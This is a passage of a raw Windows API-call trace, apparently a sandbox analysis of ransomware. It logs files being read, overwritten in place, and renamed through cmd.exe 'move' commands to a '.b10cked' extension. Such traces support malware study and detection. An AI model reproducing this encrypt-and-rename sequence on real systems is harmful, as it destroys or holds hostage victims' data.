dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xe00, dwThreadId=0x894)) returned 1 [0167.209] CloseHandle (hObject=0x1b4) returned 1 [0167.209] CloseHandle (hObject=0x114) returned 1 [0167.209] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | 
out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.209] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.209] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0167.209] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.210] ReleaseMutex (hMutex=0xf8) returned 1 [0167.210] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.210] ReleaseMutex (hMutex=0xf8) returned 1 [0167.210] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.210] ReleaseMutex (hMutex=0xf8) returned 1 [0167.210] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.210] ReleaseMutex (hMutex=0xf8) returned 1 [0167.210] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.218] QueryPerformanceCounter (in: 
lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22400733532) returned 1 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xc160 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.219] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.220] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.220] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.220] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.220] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.220] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xbc78 [0167.220] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0167.262] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0167.262] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.262] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xc160 [0167.262] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.263] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0167.263] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.263] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xc160 [0167.263] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.263] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.263] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x60af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x60af, lpOverlapped=0x0) returned 1 [0167.264] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.264] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x60af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x60af, lpOverlapped=0x0) returned 1 [0167.264] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24751, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60b1 [0167.264] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x60af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x60af, lpOverlapped=0x0) returned 1 [0167.268] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24751, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60b1 [0167.268] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x60af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
lpNumberOfBytesWritten=0x12ec1c*=0x60af, lpOverlapped=0x0) returned 1 [0167.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOR6INT.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0167.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOR6INT.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MOR6INT.REST.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0167.274] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xc160 [0167.274] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0167.275] CloseHandle (hObject=0x114) returned 1 [0167.277] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX") returned 0x3c [0167.278] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0167.278] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, 
lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x308, dwThreadId=0x7b8)) returned 1 [0167.284] CloseHandle (hObject=0x1b4) returned 1 [0167.284] CloseHandle (hObject=0x114) returned 1 [0167.284] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.284] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.284] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0167.284] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.284] ReleaseMutex (hMutex=0xf8) returned 1 [0167.285] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.285] ReleaseMutex (hMutex=0xf8) returned 1 [0167.285] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.285] ReleaseMutex (hMutex=0xf8) returned 1 [0167.285] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.285] ReleaseMutex (hMutex=0xf8) returned 1 [0167.285] CreateFileW (lpFileName="C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0167.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.285] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22407446085) returned 1 [0167.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16f60 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.287] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.287] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.287] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.287] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.287] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.287] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.287] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x16a78 [0167.287] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0167.314] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16f60 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16f60 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.314] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xb7af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xb7af, lpOverlapped=0x0) returned 1 [0167.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.327] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xb7af, lpNumberOfBytesWritten=0x12ec1c, 
lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xb7af, lpOverlapped=0x0) returned 1 [0167.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=-47023, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb7b1 [0167.327] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xb7af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xb7af, lpOverlapped=0x0) returned 1 [0167.329] SetFilePointer (in: hFile=0x114, lDistanceToMove=-47023, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb7b1 [0167.330] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xb7af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xb7af, lpOverlapped=0x0) returned 1 [0167.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 